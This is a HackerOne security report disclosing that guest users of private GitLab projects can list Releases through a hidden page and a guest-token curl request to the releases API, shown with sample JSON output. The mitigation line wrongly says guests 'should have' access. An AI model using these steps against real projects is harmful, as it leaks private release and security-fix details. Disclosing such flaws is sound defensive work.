Guest users of private projects have access to releases

HackerOne report #478082 by xanbanx on 2019-01-11, assigned to asaba:

GitLab recently introduced Releases, a way to present tags in the user interface of GitLab. These releases are currently managed via the API. Releases are closely tight to ordinary git tags, and therefore also present similar information. However, guest users, who do not have access to the code, also have access to these releases and therefore have also access to this information related to the code.

Steps to reproduce

Tested on GitLab 11.7.0-rc4-ee

1. Create a private, push some code, create a git tag, and a new release via the API. (In these steps the project is accessible via the namespace joe/test-releases)
2. Add a guest user to the project
3. As the guest user open the following page: https://gitlab.com/joe/test-releases/releases

Here, you can observe that the sidebar is not showing the releases page. However, you can access this page and retrieve the list of releases.

Similarly, you can also as a guest user you can retrieve the release via the API. Therefore, perform the following API call:

curl --request GET --header "PRIVATE-TOKEN: <GUEST-USER-TOKEN>" https://example.gitlab.com/api/v4/<project-id>/releases

This will return all releases including information like the tag, description, committing details, etc as shown below in the JSON output.

[
    {
        "tag_name": "secret-tag",
        "description": "This is a secret security release mitigating vulnerabilities",
        "name": "Secret Release",
        "description_html": "<p dir=\"auto\">This is a secret security release mitigating vulnerabilities</p>",
        "created_at": "2019-01-11T12:30:06.503Z",
        "author": {
            "id": 1,
            "name": "joe",
            "username": "joe",
            "state": "active",
            "avatar_url": "https://secure.gravatar.com/avatar/6466f73ed21b9d1624dee906821e9176?s=80&d=identicon",
            "web_url": "https://example.gitlab.com/joe"
        },
        "commit": {
            "id": "9acaed88330c5fcb7cd119e7b10af49d3a9a48ab",
            "short_id": "9acaed88",
            "title": "Add new file",
            "created_at": "2019-01-11T12:25:04.000Z",
            "parent_ids": [],
            "message": "Add new file",
            "author_name": "joe",
            "author_email": "test@bar.com",
            "authored_date": "2019-01-11T12:25:04.000Z",
            "committer_name": "joe",
            "committer_email": "test@bar.com",
            "committed_date": "2019-01-11T12:25:04.000Z"
        },
        "assets": {
            "count": 4,
            "sources": [
                {
                    "format": "zip",
                    "url": "https://example.gitlab.com/joe/test-releases/-/archive/secret-tag/test-releases-secret-tag.zip"
                },
                {
                    "format": "tar.gz",
                    "url": "https://example.gitlab.com/joe/test-releases/-/archive/secret-tag/test-releases-secret-tag.tar.gz"
                },
                {
                    "format": "tar.bz2",
                    "url": "https://example.gitlab.com/joe/test-releases/-/archive/secret-tag/test-releases-secret-tag.tar.bz2"
                },
                {
                    "format": "tar",
                    "url": "https://example.gitlab.com/joe/test-releases/-/archive/secret-tag/test-releases-secret-tag.tar"
                }
            ],
            "links": []
        }
    }
]

Similar to that, also the endpoint https://example.gitlab.com/api/v4/<project-id>/releases/:tag_name is vulnerable to this.

Steps to mitigate

Perform proper authorization in the API and for the release page. Guests should have access to this information.

Impact

Guest users have access to private information like release details, etc...

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• Screenshot_20190111_133345.png